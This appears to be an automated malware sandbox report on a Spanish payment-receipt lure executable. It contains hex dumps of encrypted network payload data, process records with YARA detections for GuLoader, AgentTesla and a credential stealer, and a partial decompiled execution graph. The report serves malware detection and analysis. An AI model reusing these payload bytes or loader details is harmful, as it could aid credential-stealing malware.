10 0b bf 39 e5 b3
                                      Data Ascii: w[mik#W=?Fy<ra5gz~RcvZN36^S18y|b%NAoYTxK>c',O25>\x9KiI/Zze9B^C.mb>e~Q2SbH;wy#"RMKC@zv_6G7x[u\Q}P$79
                                      2023-03-20 10:23:12 UTC151INData Raw: ec f7 ca 0e f3 81 9a dd b1 f3 64 92 00 65 bc c0 c2 79 19 8c b2 8f 79 8b 3d 98 cd 36 e1 8a 18 35 93 03 b1 ec 94 8a 09 25 c2 be c0 35 b3 a3 13 8c 14 34 35 e9 e4 bd 8c ca 1d 52 e0 f6 1d 37 a3 60 34 a8 c9 3d 9f 2f 32 92 0d 3c de 51 6e 77 db 37 b5 aa 61 0c 9f 43 bb e7 8f 01 e8 6b ee e2 3a 89 3b a5 42 02 e4 84 f3 5c 2d 54 ec 89 01 c2 67 75 11 52 3d 19 f9 0d b4 a4 98 67 02 d9 d2 59 c3 5f 5a 2c 80 bb e6 3f 30 c0 21 f1 54 d5 80 1d 11 a7 e0 4c e6 29 bf a6 3f d6 bd c5 2a 3e ea 90 34 98 5f a6 17 e9 9b 58 a9 8f 97 be 65 d5 a4 a4 cb fc 3f 9b d5 5b 56 1a a7 7a de 43 dc 6c 57 71 c7 8b 73 a4 ff 42 90 21 0f 0e 5e dd 61 b3 9f 59 16 1c f7 e4 1f e7 51 9a 13 0f 1f 74 35 ef 98 42 ee 46 44 55 58 0b 96 24 14 08 a9 22 40 db 87 1b 79 a1 df 35 c3 9a b5 cf 41 ab 1c f6 fe 18 4a 82 42
                                      Data Ascii: deyy=65%545R7`4=/2<Qnw7aCk:;B\-TguR=gY_Z,?0!TL)?*>4_Xe?[VzClWqsB!^aYQt5BFDUX$"@y5AJB
                                      2023-03-20 10:23:12 UTC153INData Raw: a7 73 6f c3 16 b0 96 74 3f 27 ee 57 24 fc 10 73 9f c8 2e f4 57 57 eb 28 f1 a4 17 ed c6 ff 57 bb e6 f4 e5 d8 64 51 2a 61 3b e1 01 d2 18 3f 83 a1 55 91 eb bb d5 bc 4d 46 20 a2 46 08 a2 a3 9f aa 08 30 ed 67 24 a9 17 53 40 0e 82 33 9f 42 7f 75 a5 36 67 b1 84 36 ec bd cb 18 19 b2 94 85 ea 4e 3f df 45 f9 54 5c 6a 7b 52 8b 03 04 e4 22 b9 ac af 63 42 e8 4f 64 ae 78 7d 5d f2 08 ba b7 d3 57 af b6 bc c8 46 da 2b 8c 29 39 7a be 75 8e ae be 40 3e e6 4b 8f 7a cc 23 35 16 d6 a4 54 c5 4c 06 60 b1 4e 49 76 ac 53 13 8f 44 4a a3 43 d3 18 04 61 2d 4a 93 83 f9 73 b9 0e 47 8f 41 62 1b e6 b2 fc f7 c7 a1 eb 67 e2 ad f2 b4 1b f7 1d 02 b6 db 0d 18 25 94 d0 66 c1 97 7e 3f 47 8a 90 b7 72 8a 4c 43 bd ac e6 b3 3b 9e 1a 8a 3f fa 29 c5 ef 93 16 22 b4 2f b8 10 51 2e 9d 57 5c d4 86 28 eb
                                      Data Ascii: sot?'W$s.WW(WdQ*a;?UMF F0g$S@3Bu6g6N?ET\j{R"cBOdx}]WF+)9zu@>Kz#5TL`NIvSDJCa-JsGAbg%f~?GrLC;?)"/Q.W\(
                                      2023-03-20 10:23:12 UTC154INData Raw: 74 49 3c 79 31 6d b1 66 5b a9 37 cb 65 83 13 d1 51 ce 35 e2 ad da 08 f0 96 99 d6 9a f2 74 ba 6f 59 b4 c0 8c 45 04 9a c6 8d 71 d1 2c a8 d7 71 cf 84 15 3c 93 2f b1 ea a5 ad 0c 71 b5 fe c0 30 be cd 2d 87 0f 39 3f e1 b2 8f eb dd 25 5b 98 d7 3b 3c b8 30 69 e2 c8 51 a5 4e 32 8d 1c 08 9f 06 25 13 f1 29 da b1 49 14 92 50 bd 8b b5 4a e2 63 cf 87 39 89 3b b2 4e 2c cd 89 f6 30 02 52 ed 83 10 d1 2c 11 3c 5a 59 00 f1 0f bf c1 cb 5d 1e c0 c7 55 9f 62 72 38 e3 a0 e2 25 08 ec 52 f0 49 d4 9d 30 0b be e5 2d f9 0f aa 9a 04 d6 de e4 39 3c fb e9 21 84 54 9b 16 fc 9b 5f cc cc ba b5 76 ce a5 81 a5 f9 35 84 ef 1e 7f 1e b1 53 d5 66 c6 72 38 5d c7 ee 5e bd a9 67 8f 48 28 05 5e dd 32 94 88 48 32 1f 81 ea 08 fc 60 b5 17 12 0e 71 20 ef 94 42 e1 2a 66 30 65 1c 9d 22 09 02 b5 30 47 e4
                                      Data Ascii: tI<y1mf[7eQ5toYEq,q</q0-9?%[;<0iQN2%)IPJc9;N,0R,<ZY]Ubr8%RI0-9<!T_v5Sfr8]^gH(^2H2`q B*f0e"0G
                                      2023-03-20 10:23:12 UTC155INData Raw: 44 d9 31 f6 0d ad 0a 3a 31 5c a6 1f 18 a3 f8 c8 a6 15 3d a6 73 62 d8 2b bb f0 5e 47 1e ee 54 35 f0 0d 54 b0 da 35 86 7d 5a f3 2c e1 d0 33 ec fc f4 5c b6 8a ea c6 c5 57 67 08 65 3b e6 21 d3 10 11 f7 85 55 97 ea ab d2 aa 1e 74 2d b1 55 32 8d b1 84 d8 26 37 ec 5f 20 da 20 75 43 0e 9e 2b b7 58 70 75 cb 20 6b af 80 2d f9 a6 d0 0e 3e af b3 9e 9e 66 33 cf 5f 8d 73 2c 38 5d 4e e2 26 16 8d 0c b9 ac bb 41 5d 86 59 66 cf 78 79 1c d5 17 a1 ae b1 71 af bc cc 98 60 da 25 94 18 4b 4a ae 0c 8c ab ca 76 26 84 5f 8a 1f ae 00 40 1b d3 cd 6a d9 7c 1d 68 ac 01 71 76 a0 4b 7f a4 42 33 a1 45 a7 2e 1f 03 3f 5b 82 dc f3 63 a8 0c 35 a9 5e 74 2f fa df c9 f6 e5 ae ef 71 a1 86 ff a3 2d f1 0a 18 b6 cb 2a 04 14 81 d6 75 dc 9a 79 08 4a eb 91 d2 64 a7 19 53 aa ff cd b3 25 f2 0c 86 28 fc
                                      Data Ascii: D1:1\=sb+^GT5T5}Z,3\Wge;!Ut-U2&7_ uC+Xpu k->f3_s,8]N&A]Yfxyq`%KJv&_@j|hqvKB3E.?[c5^t/q-*uyJdS%(
                                      2023-03-20 10:23:12 UTC156INData Raw: 13 ea 30 b6 08 e9 ed 57 94 14 db 56 90 73 82 96 bc fe a1 07 22 1f 7a 2b 7b b7 76 53 b0 36 c0 7d c2 32 cf 51 ba 03 f6 f0 ed 02 f0 c8 a2 d0 8d f9 61 93 69 53 b6 82 d8 77 0e 82 c1 e8 55 bc 10 a8 c7 3a ec 91 15 31 ff 17 d4 eb ae bc 3f 01 f5 b5 c0 39 bc b9 2f 83 11 24 5a ea e4 c9 9a fd 2c 51 f9 f7 24 2d 89 71 3e a8 c9 53 bd 27 26 92 0a 7a df 51 7f 28 c8 36 bf 83 4d 07 9f 51 b2 93 9f 16 e3 6b c6 e9 3d 93 3b ae 54 02 ec 94 ef 51 0c 42 9f b9 12 c0 63 01 35 66 38 39 f9 0e a0 c1 ce 45 18 d8 d6 7d df 4f 72 31 91 b2 f3 34 1e d1 44 df 55 b0 b7 01 0c a7 ec 40 a4 3d b7 ab 33 dc ca e2 65 13 e0 e2 1c 85 3b ac 16 f1 80 52 a5 e1 a6 db 51 c5 b9 99 c0 e7 7e a7 d5 39 3f 3a ab 4b d5 5b c6 77 57 71 d9 ee 4e a9 da 57 87 25 40 38 57 c0 15 ce a8 48 34 07 ed ec 1f cd 47 87 04 04 18
                                      Data Ascii: 0WVs"z+{vS6}2QaiSwU:1?9/$Z,Q$-q>S'&zQ(6MQk=;TQBc5f89E}Or14DU@=3e;RQ~9?:K[wWqNW%@8WH4G
                                      2023-03-20 10:23:12 UTC157INData Raw: 72 79 87 3b d9 24 e2 86 c4 5b de 7f 5f 03 46 10 b3 57 14 59 fb 54 c5 0e b4 00 3a 1c 73 ac 1c 4c 81 e5 c8 f0 17 2a a1 45 44 d8 0c b0 e4 65 22 2b ff 39 10 f0 0b 49 bb c4 2e 86 79 50 ea 0b fd ca 32 f1 c2 ce 5f a1 fe 8d e1 c4 08 77 09 04 0d e7 68 dc 03 7e 95 a0 27 9b fc ce e3 af 4d 43 3a c3 65 0d e3 b6 9d d8 03 24 98 70 37 a9 16 4b 2d 3d 9c 5f ba 41 16 7b bc 64 60 aa e5 2d fa c9 f1 03 16 b3 a1 bf fb 4b 56 da 55 f9 6e 12 57 69 3e a5 07 12 cb 21 a2 bd b1 52 42 f3 55 72 98 72 67 78 e9 0b c8 90 d0 56 b2 a5 d9 cf 4e c6 2e 8e 1f 4b 7b ba 78 90 99 b8 57 36 f0 5b b5 70 9b 18 2e 1c cd ba 39 e2 77 69 4e b9 2f 79 67 ce 6e 10 b3 5e 5a 81 58 c3 0f 28 7b 58 79 93 f7 e7 69 ad 0b 59 8f 74 78 22 ed 91 fc f4 c3 83 f6 03 f3 a7 f1 80 3d f7 0c 0e 92 d3 15 14 01 a5 dc 14 fd 9b 63
                                      Data Ascii: ry;$[_FWYT:sL*EDe"+9I.yP2_wh~'MC:e$p7K-=_A{d`-KVUnWi>!RBUrrgxVN.K{xW6[p.9wiN/ygn^ZX({XyiYtx"=c
                                      2023-03-20 10:23:12 UTC159INData Raw: ed fb 94 2c db d4 fe 93 3b 61 7b 91 3c c9 d8 05 d2 3d 6d 5d 92 41 e6 30 95 81 3c 95 66 b4 22 c9 2d ed f4 c7 89 93 0f 69 63 1b 53 0a dc 00 57 ce 43 a7 19 8a 50 a1 30 fb 58 8e 81 9f 67 9e ee fe b6 f7 9a 00 f4 08 33 df a6 8d 00 7b e9 b3 ea 0c ee 7e c4 a3 5c 8a f5 6d 0d 9a 74 cc 9d cb c9 68 52 9f d8 a4 5f da c5 56 ea 6d 4f 53 8d 85 b5 dd b1 59 3f 88 9a 46 59 c2 0b 43 dc bd 60 d1 56 5f e6 71 6a b4 39 0b 70 95 5d ca d6 75 79 e6 3c d6 f7 c4 70 81 02 bf 9b 5b 9b 46 da 3f 13 81 f8 9f 28 72 54 97 e7 63 ad 04 75 51 24 30 5a f5 65 d3 c3 84 3c 7f dd a6 38 b0 3c 07 57 c3 d3 8d 55 57 a4 39 b8 22 b0 e5 70 63 d7 a9 2c 8b 72 db c5 57 a1 3d 1c 4e 75 8e 9e 6c f3 3e cf 78 91 e9 30 c4 8f d1 da 1a a1 cf e5 ad 8e 70 f0 a2 32 14 5f d2 2d d1 3b b1 1e 39 07 b2 ea 1d d1 a7 3b e6 48
                                      Data Ascii: ,;a{<=m]A0<f"-icSWCP0Xg3{~\mthR_VmOSY?FYC`V_qj9p]uy<p[F?(rTcuQ$0Ze<8<WUW9"pc,rW=Nul>x0p2_-;9;H
                                      2023-03-20 10:23:12 UTC160INData Raw: e9 a9 be d3 13 26 43 d6 b7 ca 80 4a 3c d5 51 83 5b fe 50 00 1f 63 77 e6 f1 a2 f5 b0 58 91 1f 23 62 1a 79 ce 82 5c 26 af 57 8a 63 c1 6d 5c 70 35 c3 62 98 49 80 b2 f8 75 6f d5 08 8c 87 67 f5 96 23 c6 66 8c 19 54 97 71 13 ce b2 5c a6 3c 3b 8e 52 9a ae 51 9c a0 88 07 d8 98 0c 9f b9 27 33 6c 11 5b af 69 b3 63 6c ca d4 35 79 b5 c0 b3 58 c5 1d 42 cd 2f 66 e6 c2 f9 59 64 50 96 1d 5c ac 46 bd 11 6b fa 1a ff 38 0b 14 c3 75 5f d5 e0 5b 9f f4 a3 79 72 c1 d4 ec 90 32 53 a8 21 c8 30 52 3e 1e 3f f0 e3 5b 83 42 f0 d9 c3 32 10 87 29 97 f3 0a 88 bc a2 7b d9 d0 a4 30 e6 d2 b2 96 32 ba 77 e0 7a ca 34 d1 1e 4e 8a d7 37 5f 8a 30 f5 0d 4d 4d 5d 76 aa d0 37 a8 07 6c 2d c1 32 2e 1f cb 1a 7f f4 b1 0e e7 17 a6 77 68 0d 69 39 e1 96 b8 3b c8 6c b4 d6 2f 1f 53 8d d1 8f 18 e3 c8 9c 82
                                      Data Ascii: &CJ<Q[PcwX#by\&Wcm\p5bIuog#fTq\<;RQ'3l[icl5yXB/fYdP\Fk8u_[yr2S!0R>?[B2){02wz4N7_0MM]v7l-2.whi9;l/S
                                      2023-03-20 10:23:12 UTC161INData Raw: f4 46 64 6f 3b d1 ea de 37 08 43 9a 1c 46 09 46 94 92 29 be 72 ff 31 dc ce 67 26 3d 78 7e 98 21 e1 d5 04 c8 30 61 74 8f 56 75 00 be 8f 2a 81 61 83 23 dd a4 df f4 db 1a 97 09 75 f2 5e 55 06 dc 1c 04 47 6f bb 1b be 41 ba a3 86 4d 81 8b 91 62 bd e4 ea b6 e3 98 00 f6 0e 35 d4 ac 8e 18 73 f5 b4 ef 18 f7 6a c5 ab 57 82 e4 74 45
                                      Data Ascii: Fdo;7CFF)r1g&=x~!0atVu*a#u^UGoAMb5sjWtE
                                      2023-03-20 10:23:12 UTC161INData Raw: 81 59 d5 96 eb cf 72 4c 92 c2 99 5d dc ce 53 f0 40 56 54 85 94 af f8 b8 47 3f 90 8c 40 57 c4 0b 55 c2 a4 3e c1 4a 67 ff 71 74 be 24 0a 75 88 57 5a 3a 29 7f fe 31 cc 67 21 65 98 0f ab 84 43 fb 54 d2 37 03 a8 f0 88 0d 61 2f 9f ef 72 25 ff 74 4e 36 5e 6b 9a 6b dd d0 19 95 5f b3 a9 2d a3 07 1e 46 62 ef 92 43 6a a4 2f bc 3b be f6 f9 37 dd 9b ac b6 7f cc f8 56 a1 3c ad 5e 44 ca 91 7f e3 2a 6e 18 9d fa 26 de 0e d0 d9 0c b2 c2 e0 b5 8b 51 ed ae 5b 04 6d 53 c2 b1 2b b5 03 3f 10 bf fc 20 d1 a7 3e ec 55 60 62 3a b6 7c ee e7 23 4e 7c 89 90 63 80 22 eb 6b 7d 63 27 54 9c ff 3e 90 2c 21 56 1f 52 e4 4d 7e 6d db 56 30 8a e3 15 3a e2 b1 4e bb e8 c5 a6 2b cf 71 f2 8a 76 06 ee 32 fc 69 9f 7c 65 94 c3 0e 1b 16 28 b9 e6 f4 17 0b ec 8f 46 43 3d ad 1f 38 fd f4 4d d2 53 c8 29 6f
                                      Data Ascii: YrL]S@VTG?@WU>Jgqt$uWZ:)1g!eCT7a/r%tN6^kk_-FbCj/;7V<^D*n&Q[mS+? >U`b:|#N|c"k}c'T>,!VRM~mV0:N+qv2i|e(FC=8MS)o
                                      2023-03-20 10:23:12 UTC162INData Raw: e5 8d d6 b1 66 34 08 04 3a 92 56 ba 63 6b e5 e8 26 ea 08 f2 b4 cb 70 01 59 d1 a1 82 e0 d9 e5 d6 69 40 19 56 5d b4 51 32 3f ff d7 4a ec 0b 17 0f d9 e4 fb de eb 40 83 c1 ac 6a 79 cf db ec 9b 32 44 3c 0c 90 3f 54 25 1d 36 ea 77 74 0d b7 d3 d6 d8 2e 24 a6 38 17 dc 1b 1a 1d 95 7e c4 cb a3 1f da c6 ae 18 de ab 44 ef 66 58 0f d7 11 ca c7 cf 2f 52 8c 2c 7a ee de f0 31 6a 23 38 31 aa 2f 6c 05 dc 2a 35 17 d3 3f 77 ac 37 3e f7 25 9a 6b 7f 82 64 30 f8 9e af 08 db ff 71 ff 20 90 4b 8a d1 88 8b 9b c7 9c 82 a9 d7 87 50 b1 90 70 62 d6 8f 78 73 e5 e8 b6 95 a0 e0 19 76 23 98 62 ee 13 c4 98 cd da f1 9b c4 6a f3 4d 73 52 8c 4d f4 8b 81 f0 4f c8 7f ff 78 2a 49 68 37 5e 89 d1 43 a2 91 b9 b8 d4 5d 50 ef 69 50 91 fe ba c6 2d 6e e5 b8 af f1 03 1b 1e 48 24 aa a6 3b 36 ba 94 63 25
                                      Data Ascii: f4:Vck&pYi@V]Q2?J@jy2D<?T%6wt.$8~DfX/R,z1j#81/l*5?w7>%kd0q KPpbxsv#bjMsRMOx*Ih7^C]PiP-nH$;6c%
                                      2023-03-20 10:23:12 UTC164INData Raw: 2f 50 90 91 18 75 e1 b5 ee 09 ed 5f cc b1 2f 8a e3 69 42 ae 65 c6 19 f7 c0 40 42 92 c2 99 5d c0 bd 4f c2 7c 56 4f 9f bc bc d7 c9 43 17 99 83 5d 4b f7 02 49 4d 90 3b dc 5c 7a ff 6b 0a a9 14 0a 76 8f 35 d1 c0 2b 73 8e 31 cf a2 dd 76 f6 07 a5 92 58 bf 5b d0 57 05 89 e1 9b 3e 6e 3f 91 fc 60 a7 0c 7b 4d 38 54 4d 8d 71 ee c0 8d 36 ed 4d a1 36 bf 38 19 53 e1 c1 05 78 5f a7 3f b2 22 90 e5 76 63 d5 b9 2c 8b 64 c0 c5 51 83 bc 90 55 55 81 94 7b f7 25 ef 7f bf f6 2f c2 9d bc de 22 bd cb f0 ab 85 57 f9 be 55 19 62 dd 37 ad 36 a8 1d 25 1c a2 e2 1b c5 bb 1e e3 5d 7f ed cb ba 6f ee f7 0d 53 67 93 b0 6c 9d 2e 76 8f 63 65 2c 5a bd f0 22 99 38 1c 54 04 5f 79 a8 7b 63 d5 59 25 a6 f7 09 0d e4 b3 54 31 d8 ce a6 2d c9 71 fe a2 6a 00 e5 3f d4 60 96 6f 68 97 d6 1e 28 0a 28 b1 c2
                                      Data Ascii: /Pu_/iBe@B]O|VOC]KIM;\zkv5+s1vX[W>n?`{M8TMq6M68Sx_?"vc,dQUU{%/"WUb76%]oSgl.vce,Z"8T_y{cY%T1-qj?`oh((
                                      2023-03-20 10:23:12 UTC165INData Raw: 91 7f 1c db bf 53 86 3d 28 9b 41 91 b9 53 96 b1 9e ba d9 8a 9e a4 b9 1a b5 c5 19 4c 8f 6d af f7 13 ea d0 3a fd 94 cb a9 d5 4d 04 51 c6 3c 7e fe d2 e3 c9 e0 2b 9c 10 27 a9 54 3a 2a 7c fa de 5a 3e 00 1d c1 6a 1f d8 f8 4b 90 cc bf 72 6a c4 c7 73 c7 2e d4 80 2d 8e 39 5e 3e 1d 39 c2 60 67 9f cf f1 d0 d0 20 2f 9b 3e 18 c1 40 0e 36 93 6e 49 db b3 2c d5 dd a1 9d 2f b5 4f e9 60 43 15 da 11 ca c8 48 67 45 06 03 f3 0d 4d 1c 5d 7d bf c8 24 a5 07 61 10 c4 3d bf 46 d3 3f 71 fb 35 21 60 62 ba 6f 70 06 4a bc a3 9e af 1b cc 70 3b f8 b3 a8 53 8d c2 98 84 a3 db 8b 11 23 9b 8b d4 46 87 6c f6 c1 b0 77 6f 6c ed a4 16 bd e7 8a 4e 20 84 ed cf 03 c8 1c 37 df fb 86 dc 4a f7 57 fe 5a 9c 5d a3 0b b2 7b 55 41 51 ff 73 2c 5c e3 38 41 82 d9 54 8e cd b6 3c d4 4d 40 f3 fa d4 1b f8 aa d4
                                      Data Ascii: S=(ASLm:MQ<~+'T:*|Z>jKrjs.-9^>9`g />@6nI,/O`CHgEM]}$a=F?q5!`bopJp;S#FlwolN 7JWZ]{UAQs,\8AT<M@
                                      2023-03-20 10:23:12 UTC166INData Raw: 02 84 ba a3 7e 58 85 83 9a 75 1c 22 e4 39 26 92 02 ff 07 3e c3 85 9e 97 b9 e1 b7 e8 1c ed e3 09 af 58 86 f7 fd 89 81 e5 10 8a 4a 6d 68 4b 87 d2 b6 dd 16 c3 57 63 ac 5b 5a 8e 93 3c 01 ab c8 ee 89 03 99 5b c3 04 58 de 2d f8 db cf 8b f6 72 5a a8 26 8a bb 8c c4 12 c9 26 6f f1 04 db f5 5d a8 97 8e 6b 89 5b 7b 83 d3 0a 0c a0 e2 99 22 e1 fd 8d 7b ac ad 05 60 42 0b 58 59 19 af c0 c6 95 2a 65 ba bf 36 bf 27 11 5a e0 ce 89 59 4a ab 29 ba 21 90 e6 7a 71 c2 08 9c 83 4a da c4 46 32 75 9f 45 5b 88 97 74 ff 32 e7 73 97 f3 13 cf 8e c8 de 0a b4 e3 ea b1 9f 42 cd b1 49 90 b3 db 36 b2 32 bc 17 32 15 ad e9 1a d9 a0 32 cf 5a ee e1 20 39 ad f2 7b e1 46 63 02 a4 6c 99 12 ff 71 74 7a a1 7d 9c e0 0e 8a 2a 23 52 0c 4b f0 58 59 6d ce 51 1f b6 f0 9a fc ed b1 42 bd f7 d4 2f e6 cf 7f
                                      Data Ascii: ~Xu"9&>XJmhKWc[Z<[X-rZ&&o]k[{"{`BXY*e6'ZYJ)!zqJF2uE[t2sBI6222Z 9{Fclqtz}*#RKXYmQB/
                                      2023-03-20 10:23:12 UTC167INData Raw: e4 9d bc f0 8f 6a d5 3a 4d b6 62 d5 96 31 47 53 8b 39 57 95 7f 1d de bc 5a 86 3e 35 9e 5c 94 a4 56 9e b5 9a 3a d9 8a 8d a3 b1 08 34 7c 04 49 92 68 bd 76 7e f7 d5 27 f8 89 ce a1 d9 4d 00 4c c3 21 7b e3 d7 eb d8 61 52 98 13 41 a9 54 3c 2d 7e eb 5f fe 36 14 1a db 64 02 dd c5 4e 8d 49 ba 77 77 c1 85 f1 9e bc 56 bd 30 8d 31 5c 38 1e 3e e2 62 66 8d 4e d1 d8 d7 20 2d 86 03 16 cf 9b 09 1c 86 7c c8 de b1 22 db d3 bc 98 27 a8 4b e1 68 4b 08 df 8c cf da ca 32 57 84 3e fb 1f cc 71 40 78 a2 cd 39 a0 0e 69 0c c1 2f 3d 77 ce 3a ff e6 30 33 e2 37 a7 6a 6d 03 58 3e f6 83 aa 07 c9 7e 35 ea 32 81 4e 88 df 3d 59 a4 c6 32 01 a1 c2 96 d1 48 92 7e 77 c4 b2 25 a2 66 e0 4e 15 a8 f5 0b 4b 22 8a e3 d2 06 d5 a5 32 ec ff 8e d6 01 f2 0c f2 05 99 0a b1 cf 93 23 47 93 70 bc 79 70 5b a7
                                      Data Ascii: j:Mb1GS9WZ>5\V:4|Ihv~'ML!{aRAT<-~_6dNIwwV01\8>bfN -|"'KhK2W>q@x9i/=w:037jmX>~52N=Y2H~w%fNK"2#Gpyp[
                                      2023-03-20 10:23:12 UTC169INData Raw: 57 8c 89 a6 fd a6 2a 04 1c 76 61 69 a1 7f 38 b0 60 8c 37 8e 4a 88 02 9a 70 af a3 b9 47 a1 94 93 c9 8a f9 73 83 65 59 94 d4 e9 75 08 9d db 87 72 b3 07 bb c6 33 a2 89 19 26 f6 08 e9 ba aa bb 29 2c f1 bf cf 39 a0 ef 66 97 14 16 39 ee e4 ce b6 84 6b 51 f9 ee 3b 3c e8 2c 65 c1 a6 1d e9 6e 67 de 59 46 83 46 6e 06 e8 20 a9 b3 4d 05 ae 56 b7 91 b5 08 e3 68 c6 f4 77 f7 50 e2 07 22 89 d9 b5 43 05 52 ea 88 09 d1 7b 4b 5d 3c 79 6b a4 4c a7 b3 ed 57 19 fd cc 5e de 04 12 5e df fc e6 22 24 c0 4c d0 4a c9 da 75 75 d3 89 2d 8a 6a de c5 57 b3 bd 91 4b 55 8f 90 71 f6 3b ef 79 9f f4 33 cc 8f d5 db 02 bc ca ed a5 8a 50 f0 b0 5b 11 7f d3 3f b0 35 b5 1e 38 1f aa ee 1d d0 a9 23 e2 48 6e 6c 32 b8 61 e0 fa 2d 53 72 81 8d 6d 88 3f f7 76 61 6b 22 54 9d f1 23 8c 2a 21 55 11 4e f8 51
                                      Data Ascii: W*vai8`7JpGseYur3&),9f9kQ;<,engYFFn MVhwP"CR{K]<ykLW^^"$LJuu-jWKUq;y3P[?58#Hnl2a-Srm?vak"T#*!UNQ


                                      Click to jump to process

                                      Click to jump to process

                                      Click to dive into process behavior distribution

                                      Click to jump to process

                                      Target ID:2
                                      Start time:11:21:21
                                      Start date:20/03/2023
                                      Path:C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exe
                                      Imagebase:0x400000
                                      File size:433352 bytes
                                      MD5 hash:E542CF9CE8A67A5B681CC9B0004E0B10
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2804076292.0000000005376000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low

                                      Target ID:7
                                      Start time:11:23:02
                                      Start date:20/03/2023
                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exe
                                      Imagebase:0xaa0000
                                      File size:108664 bytes
                                      MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET
                                      Yara matches:
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.6893759617.00000000360C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.6893759617.00000000360C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:high

                                      Target ID:8
                                      Start time:11:23:02
                                      Start date:20/03/2023
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff78c150000
                                      File size:875008 bytes
                                      MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:21.9%
                                        Dynamic/Decrypted Code Coverage:13.5%
                                        Signature Coverage:19.6%
                                        Total number of Nodes:1554
                                        Total number of Limit Nodes:40
                                        execution_graph 5011 10001000 5014 1000101b 5011->5014 5021 10001516 5014->5021 5016 10001020 5017 10001024 5016->5017 5018 10001027 GlobalAlloc 5016->5018 5019 1000153d 3 API calls 5017->5019 5018->5017 5020 10001019 5019->5020 5023 1000151c 5021->5023 5022 10001522 5022->5016 5023->5022 5024 1000152e GlobalFree 5023->5024 5024->5016 4014 4015c1 4015 402c37 17 API calls 4014->4015 4016 4015c8 4015->4016 4033 405bdb CharNextW CharNextW 4016->4033 4018 401631 4020 401663 4018->4020 4021 401636 4018->4021 4019 405b5d CharNextW 4029 4015d1 4019->4029 4024 401423 24 API calls 4020->4024 4047 401423 4021->4047 4030 40165b 4024->4030 4028 40164a SetCurrentDirectoryW 4028->4030 4029->4018 4029->4019 4031 401617 GetFileAttributesW 4029->4031 4039 40582c 4029->4039 4042 405792 CreateDirectoryW 4029->4042 4051 40580f CreateDirectoryW 4029->4051 4031->4029 4034 405bf8 4033->4034 4037 405c0a 4033->4037 4035 405c05 CharNextW 4034->4035 4034->4037 4038 405c2e 4035->4038 4036 405b5d CharNextW 4036->4037 4037->4036 4037->4038 4038->4029 4054 406639 GetModuleHandleA 4039->4054 4043 4057e3 GetLastError 4042->4043 4044 4057df 4042->4044 4043->4044 4045 4057f2 SetFileSecurityW 4043->4045 4044->4029 4045->4044 4046 405808 GetLastError 4045->4046 4046->4044 4048 4052c3 24 API calls 4047->4048 4049 401431 4048->4049 4050 40625f lstrcpynW 4049->4050 4050->4028 4052 405823 GetLastError 4051->4052 4053 40581f 4051->4053 4052->4053 4053->4029 4055 406655 4054->4055 4056 40665f GetProcAddress 4054->4056 4060 4065c9 GetSystemDirectoryW 4055->4060 4058 405833 4056->4058 4058->4029 4059 40665b 4059->4056 4059->4058 4061 4065eb wsprintfW LoadLibraryExW 4060->4061 4061->4059 4063 401941 4064 401943 4063->4064 4065 402c37 17 API calls 4064->4065 4066 401948 4065->4066 4069 40596d 4066->4069 4108 405c38 4069->4108 4072 405995 DeleteFileW 4074 401951 4072->4074 4073 4059ac 4075 405ad7 4073->4075 4122 40625f lstrcpynW 4073->4122 4075->4074 4140 4065a2 FindFirstFileW 4075->4140 4077 4059d2 4078 4059e5 4077->4078 4079 4059d8 lstrcatW 4077->4079 4123 405b7c lstrlenW 4078->4123 4081 4059eb 4079->4081 4083 4059fb lstrcatW 4081->4083 4085 405a06 lstrlenW FindFirstFileW 4081->4085 4083->4085 4087 405acc 4085->4087 4089 405a28 4085->4089 4086 405af5 4143 405b30 lstrlenW CharPrevW 4086->4143 4087->4075 4091 405aaf FindNextFileW 4089->4091 4101 40596d 60 API calls 4089->4101 4103 4052c3 24 API calls 4089->4103 4105 4052c3 24 API calls 4089->4105 4127 40625f lstrcpynW 4089->4127 4128 405925 4089->4128 4136 406025 MoveFileExW 4089->4136 4091->4089 4095 405ac5 FindClose 4091->4095 4092 405925 5 API calls 4094 405b07 4092->4094 4096 405b21 4094->4096 4097 405b0b 4094->4097 4095->4087 4098 4052c3 24 API calls 4096->4098 4097->4074 4100 4052c3 24 API calls 4097->4100 4098->4074 4102 405b18 4100->4102 4101->4089 4104 406025 36 API calls 4102->4104 4103->4091 4106 405b1f 4104->4106 4105->4089 4106->4074 4146 40625f lstrcpynW 4108->4146 4110 405c49 4111 405bdb 4 API calls 4110->4111 4113 405c4f 4111->4113 4112 40598d 4112->4072 4112->4073 4113->4112 4114 4064f3 5 API calls 4113->4114 4120 405c5f 4114->4120 4115 405c90 lstrlenW 4116 405c9b 4115->4116 4115->4120 4118 405b30 3 API calls 4116->4118 4117 4065a2 2 API calls 4117->4120 4119 405ca0 GetFileAttributesW 4118->4119 4119->4112 4120->4112 4120->4115 4120->4117 4121 405b7c 2 API calls 4120->4121 4121->4115 4122->4077 4124 405b8a 4123->4124 4125 405b90 CharPrevW 4124->4125 4126 405b9c 4124->4126 4125->4124 4125->4126 4126->4081 4127->4089 4147 405d2c GetFileAttributesW 4128->4147 4131 